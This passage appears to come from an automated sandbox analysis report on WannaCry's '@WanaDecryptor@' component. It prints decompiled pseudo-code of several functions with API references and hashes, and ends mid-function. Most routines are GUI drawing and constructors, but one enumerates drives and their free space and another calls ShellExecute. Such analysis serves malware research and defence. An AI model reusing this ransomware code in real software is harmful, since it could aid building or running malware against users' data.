                                  • Instruction Fuzzy Hash: 7621E9B5204701AFD304DF14C995FABB7E8EB88B04F108A1DF58697291CB78EC45CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004034A0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E004034A0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413620);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0xe8)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x004034a0
                                  0x004034a2
                                  0x004034ad
                                  0x004034ae
                                  0x004034ba
                                  0x004034c6
                                  0x004034d6
                                  0x004034d7
                                  0x004034e0
                                  0x004034e4
                                  0x004034e7
                                  0x004034ef
                                  0x00403519
                                  0x0040351f
                                  0x00403524
                                  0x00403529
                                  0x00403535
                                  0x0040353d
                                  0x0040354b
                                  0x00403555

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction ID: 278ac0b80a8d68711b6ced8a2ef72b48c78586c4dd5442d856e74ad00dc42751
                                  • Opcode Fuzzy Hash: e98b5bf81114f17ba521e4ef3fa09cb8d98efe28b03220bb61ec6d1cf8ad346c
                                  • Instruction Fuzzy Hash: DB113375204741AFC314DF69D985F9BB7E8FB88714F008A1EB55AD3280DB78E8448B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406940 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00406940(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413E30);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x824)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00406940
                                  0x00406942
                                  0x0040694d
                                  0x0040694e
                                  0x0040695a
                                  0x00406966
                                  0x00406976
                                  0x00406977
                                  0x00406980
                                  0x00406984
                                  0x00406987
                                  0x0040698f
                                  0x004069b9
                                  0x004069bf
                                  0x004069c4
                                  0x004069c9
                                  0x004069d5
                                  0x004069dd
                                  0x004069eb
                                  0x004069f5

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction ID: 6a096d29dde81ab0807628e72033e91f5df492254ff76bbe7bc423a6b66a9ecc
                                  • Opcode Fuzzy Hash: 94bfcdd95dccd0665c65ca55dcb9de4da2bf1fb5487f65770e6e71c06e885f3f
                                  • Instruction Fuzzy Hash: CB113375204741AFC314DF69D985F9BB7E8FB8C714F008A1EB599D3280DB78D8058BA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404EB0 Relevance: 9.1, APIs: 6, Instructions: 56windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 62%
                                  			E00404EB0(void* __ecx) {
				intOrPtr _v0;
				int _v8;
				struct tagRECT _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char _v40;
				intOrPtr _v48;
				intOrPtr _v72;
				char* _t20;
				int _t23;
				void* _t45;
				intOrPtr _t48;

				_push(0xffffffff);
				_push(E00413870);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t48;
				_t45 = __ecx;
				GetClientRect( *(__ecx + 0x20),  &_v28);
				_push( *((intOrPtr*)(_t45 + 0x6c)));
				L00412D76();
				_t20 =  &_v40;
				_push(_t20);
				_v8 = 0;
				L00412D70();
				_t23 = PatBlt( *(_v0 + 4), 0, 0, _v28.left - _v36, _v28.top - _v32, 0xf00021);
				_push(_t20);
				L00412D70();
				_v72 = 0x415c00;
				_v40 = 1;
				L00412D52();
				 *[fs:0x0] = _v48;
				return _t23;
			}















                                  0x00404eb0
                                  0x00404eb2
                                  0x00404ebd
                                  0x00404ebe
                                  0x00404eca
                                  0x00404ed6
                                  0x00404ee3
                                  0x00404ee4
                                  0x00404eed
                                  0x00404ef1
                                  0x00404ef4
                                  0x00404efc
                                  0x00404f26
                                  0x00404f2c
                                  0x00404f31
                                  0x00404f36
                                  0x00404f42
                                  0x00404f4a
                                  0x00404f58
                                  0x00404f62

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#2414#283ClientRect
                                  • String ID:
                                  • API String ID: 3728838672-0
                                  • Opcode ID: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction ID: d163b7983d6ef18c2c490a4321b6073019a727c2a72f1ecd8d9e2d5251008e6b
                                  • Opcode Fuzzy Hash: 46ba31fa0516e8aa439e01c94c41dc17825091199510f8b9dc900171e6d2ebb4
                                  • Instruction Fuzzy Hash: CB113375204701AFC314DF69D985F9BB7E8FB88714F008A1EB599D3280DB78D8058B55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404310 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404310(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _v40;
				intOrPtr _v48;
				void* _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				intOrPtr _v112;
				void* _v128;
				void* _v132;
				void* _t20;
				void* _t22;
				void* _t39;
				intOrPtr _t40;
				intOrPtr _t42;

				_push(0xffffffff);
				_push(E004137A8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t42;
				_t39 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x58)) == 0) {
					E004044C0(__ecx, 0);
				}
				L00412DD0();
				_t20 = _t39 + 0x48;
				_v8 = 0;
				L00412DCA();
				L00412DC4();
				L00412DBE();
				_t40 =  *((intOrPtr*)(_t39 + 0x40));
				_t22 =  *((intOrPtr*)(_v112 + 0x64))(0, 0, _t40,  *((intOrPtr*)(_t40 - 8)),  *((intOrPtr*)(_t39 + 0x64)), 1, _t20, _t39);
				_push(_t20);
				L00412DCA();
				_v40 = 0xffffffff;
				L00412DB8();
				 *[fs:0x0] = _v48;
				return _t22;
			}


















                                  0x00404316
                                  0x00404318
                                  0x0040431d
                                  0x0040431e
                                  0x00404329
                                  0x00404331
                                  0x00404335
                                  0x00404335
                                  0x0040433f
                                  0x00404344
                                  0x0040434c
                                  0x00404354
                                  0x00404361
                                  0x0040436e
                                  0x00404373
                                  0x00404387
                                  0x0040438a
                                  0x0040438f
                                  0x00404398
                                  0x004043a0
                                  0x004043ab
                                  0x004043b5

                                  APIs
                                  • #470.MFC42(?,00000000), ref: 0040433F
                                  • #5789.MFC42 ref: 00404354
                                  • #5875.MFC42(00000001), ref: 00404361
                                  • #6172.MFC42(?,00000001), ref: 0040436E
                                  • #5789.MFC42(00000000), ref: 0040438F
                                  • #755.MFC42(00000000), ref: 004043A0
                                    • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
                                    • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
                                    • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                    • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
                                    • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                    • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
                                    • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #5789$#1641#2860#2864#470#5875#6172#755CreateFontIndirectMessageObjectParentSend
                                  • String ID:
                                  • API String ID: 3301245081-0
                                  • Opcode ID: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                  • Instruction ID: 67bcf298962d36d7fa18f20cd84a87d7b1dd540c5c31f1d51ecab4020f7c2e08
                                  • Opcode Fuzzy Hash: cf1f65109254071a6a46f66f86cff4d395b2f690d68131f85178f7e4ade46d7e
                                  • Instruction Fuzzy Hash: 4611CE71104300AFC310EF14D841FDAB7A4EF94724F008A1EF5A6932D0CBB8A484CB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403EB0 Relevance: 9.0, APIs: 6, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 46%
                                  			E00403EB0(void* __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				_push(_t9);
				_push(0x407);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(0x408);
				L00412CE6();
				L00412D88();
				_push(_t9);
				_push(2);
				L00412CE6();
				L00412D88();
				return __eax;
			}




                                  0x00403eb2
                                  0x00403eb8
                                  0x00403eb9
                                  0x00403ebe
                                  0x00403ec5
                                  0x00403eca
                                  0x00403ecb
                                  0x00403ed2
                                  0x00403ed9
                                  0x00403ede
                                  0x00403edf
                                  0x00403ee3
                                  0x00403eea
                                  0x00403ef1

                                  APIs
                                  • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                  • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                  • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                  • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                  • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                  • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092
                                  • String ID:
                                  • API String ID: 2547810013-0
                                  • Opcode ID: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction ID: 4bb7b71439f2442b6829c2e1ec9f7e71f44d4abaae38a5a684cddd693ffb540b
                                  • Opcode Fuzzy Hash: e7ddd79a8d322918c2dba81477a0c723ed6b3b7cf26a0e59a3b85b9555a4b9c5
                                  • Instruction Fuzzy Hash: 46D0ECB179425427D9543273AE1BD9F4959AFE1B15B10052FB301EB2C2ECFC58A282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00403A20 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00403A20(intOrPtr _a4, intOrPtr _a8) {
				union _ULARGE_INTEGER _v8;
				union _ULARGE_INTEGER _v16;
				intOrPtr _v20;
				union _ULARGE_INTEGER _v24;
				short _v28;
				short _v32;
				short _t23;
				short _t34;
				signed int _t47;
				unsigned int _t50;

				if( *((intOrPtr*)(_a8 + 8)) != 0) {
					return 1;
				} else {
					_t50 = GetLogicalDrives();
					_t47 = 2;
					do {
						if((_t50 >> _t47 & 0x00000001) != 0) {
							_t23 =  *L" : "; // 0x3a0020
							_t34 =  *0x420760; // 0x20
							_v32 = _t23;
							_t7 = _t47 + 0x41; // 0x43
							_v28 = _t34;
							_v32 = _t7;
							_v28 = 0x5c;
							if(GetDriveTypeW( &_v32) != 5 && GetDiskFreeSpaceExW( &_v32,  &_v8,  &_v24,  &_v16) != 0 && (_v20 > 0 || _v24.LowPart > 0)) {
								_v28 = 0;
								E004026B0(_a4,  &_v32);
							}
						}
						_t47 = _t47 + 1;
					} while (_t47 <= 0x19);
					return 1;
				}
			}













                                  0x00403a2c
                                  0x00403ae4
                                  0x00403a32
                                  0x00403a41
                                  0x00403a43
                                  0x00403a48
                                  0x00403a51
                                  0x00403a53
                                  0x00403a58
                                  0x00403a5e
                                  0x00403a66
                                  0x00403a69
                                  0x00403a6e
                                  0x00403a73
                                  0x00403a7f
                                  0x00403ab8
                                  0x00403abf
                                  0x00403abf
                                  0x00403a7f
                                  0x00403ac4
                                  0x00403ac5
                                  0x00403ad9
                                  0x00403ad9

                                  APIs
                                  • GetLogicalDrives.KERNEL32 ref: 00403A35
                                  • GetDriveTypeW.KERNEL32 ref: 00403A7A
                                  • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: DiskDriveDrivesFreeLogicalSpaceType
                                  • String ID: : $\
                                  • API String ID: 222820107-856521285
                                  • Opcode ID: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction ID: 7a2fb974cbacd17fa61847377d7cab912bc040039a87a27a6beb81165ce83d4b
                                  • Opcode Fuzzy Hash: 8d838ba2e6f39d2646f0809dd41db9d52f5210801079b522eea1ca76c3ac80bf
                                  • Instruction Fuzzy Hash: 2D116D31614301ABD315DF15D884AABBBE8FBC8710F04882EF88597290E775E948CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406EF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E00406EF0(void* __ecx, char* _a4, void** _a8) {
				char* _v4;
				char _v8;
				void* _v12;
				char* _t14;
				char _t15;
				char* _t17;
				struct HWND__* _t18;
				char _t23;

				_t14 = _a4;
				if(_t14[0xc] != 0x201) {
					L5:
					 *_a8 = 0;
					return _t14;
				}
				_t23 = _t14[0x18];
				_t15 = _t14[0x1c];
				_v8 = _t15;
				_t17 = _t15 - _t23 + 1;
				_v12 = _t23;
				_push(_t17);
				L00412CEC();
				_v4 = _t17;
				if(_t17 != 0) {
					_t18 = __ecx + 0x4c0;
					if(_t18 != 0) {
						_t18 =  *(_t18 + 0x20);
					}
					SendMessageA(_t18, 0x44b, 0,  &_v12);
					ShellExecuteA(0, "open", _v4, 0, 0, 5);
					_t14 = _v4;
					_push(_t14);
					L00412C98();
					goto L5;
				}
				return _t17;
			}











                                  0x00406ef0
                                  0x00406f01
                                  0x00406f6a
                                  0x00406f6e
                                  0x00000000
                                  0x00406f6e
                                  0x00406f03
                                  0x00406f06
                                  0x00406f09
                                  0x00406f0f
                                  0x00406f10
                                  0x00406f14
                                  0x00406f15
                                  0x00406f1d
                                  0x00406f23
                                  0x00406f25
                                  0x00406f2d
                                  0x00406f2f
                                  0x00406f2f
                                  0x00406f3f
                                  0x00406f57
                                  0x00406f5d
                                  0x00406f61
                                  0x00406f62
                                  0x00000000
                                  0x00406f67
                                  0x00406f78

                                  APIs
                                  • #823.MFC42(?), ref: 00406F15
                                  • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
                                  • #825.MFC42(?), ref: 00406F62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #823#825ExecuteMessageSendShell
                                  • String ID: open
                                  • API String ID: 1093558810-2758837156
                                  • Opcode ID: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                  • Instruction ID: 5f9a2cd0b307edef7ddb37fa3a9b8e73568683458afc550aac563bbb23be8fd8
                                  • Opcode Fuzzy Hash: fd047fd9ae49066b11ca0bfdd1a15bae3696c59196635434c28e1a6aef66c3a1
                                  • Instruction Fuzzy Hash: 0C0148B0A50301AFE610DF24DD4AF5B77E8AB84B14F00C42AF9499B291E6B4E814CB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004030E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E004030E0(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t30;

				_push(0xffffffff);
				_push(E004135B3);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t30;
				_push(__ecx);
				_push(_a4);
				_push(0x8a);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0x60)) = 0x415b28;
				_v12 = 1;
				L00412C8C();
				 *((intOrPtr*)(__ecx + 0xa0)) = 0x415a58;
				 *((intOrPtr*)(__ecx + 0xe4)) = 0;
				 *((intOrPtr*)(__ecx + 0xe0)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0xf0)) = 0;
				 *((intOrPtr*)(__ecx + 0xec)) = 0x415a30;
				 *((intOrPtr*)(__ecx)) = 0x415958;
				 *((intOrPtr*)(__ecx + 0xf4)) = 0;
				 *[fs:0x0] = _v20;
				return __ecx;
			}







                                  0x004030e0
                                  0x004030e2
                                  0x004030ed
                                  0x004030ee
                                  0x004030f5
                                  0x004030ff
                                  0x00403100
                                  0x00403105
                                  0x00403109
                                  0x00403115
                                  0x00403119
                                  0x0040311e
                                  0x0040312a
                                  0x00403131
                                  0x0040313a
                                  0x00403140
                                  0x00403146
                                  0x00403150
                                  0x00403156
                                  0x00403160
                                  0x00403166
                                  0x00403171
                                  0x0040317b

                                  APIs
                                  • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                  • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #567$#324
                                  • String ID: 0ZA$DZA
                                  • API String ID: 784016053-3838179817
                                  • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                  • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                  • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404C40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _t24;

				_push(0xffffffff);
				_push(E00413809);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(__ecx);
				_push(_a4);
				_push(0x89);
				_v16 = __ecx;
				L00412C92();
				_v12 = 0;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
				_push(0x421798);
				_v12 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415ec8;
				L00412DA0();
				 *[fs:0x0] = _v24;
				return __ecx;
			}







                                  0x00404c40
                                  0x00404c42
                                  0x00404c4d
                                  0x00404c4e
                                  0x00404c55
                                  0x00404c5e
                                  0x00404c5f
                                  0x00404c64
                                  0x00404c68
                                  0x00404c70
                                  0x00404c7a
                                  0x00404c7f
                                  0x00404c86
                                  0x00404c8d
                                  0x00404c94
                                  0x00404c9b
                                  0x00404ca2
                                  0x00404ca7
                                  0x00404cad
                                  0x00404cba
                                  0x00404cc4

                                  APIs
                                  • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                  • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                  • #860.MFC42(00421798), ref: 00404CAD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #324#540#860
                                  • String ID: 0ZA$DZA
                                  • API String ID: 1048258301-3838179817
                                  • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                  • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                  • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408B40 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 78%
                                  			E00408B40(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t23;
				int _t25;
				intOrPtr _t30;
				int _t38;
				int _t41;
				intOrPtr* _t43;
				int _t45;
				intOrPtr _t47;
				struct HDC__* _t50;
				intOrPtr _t52;

				_push(0xffffffff);
				_push(E0041407B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t52;
				_t47 = __ecx;
				_v20 = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x4166e0;
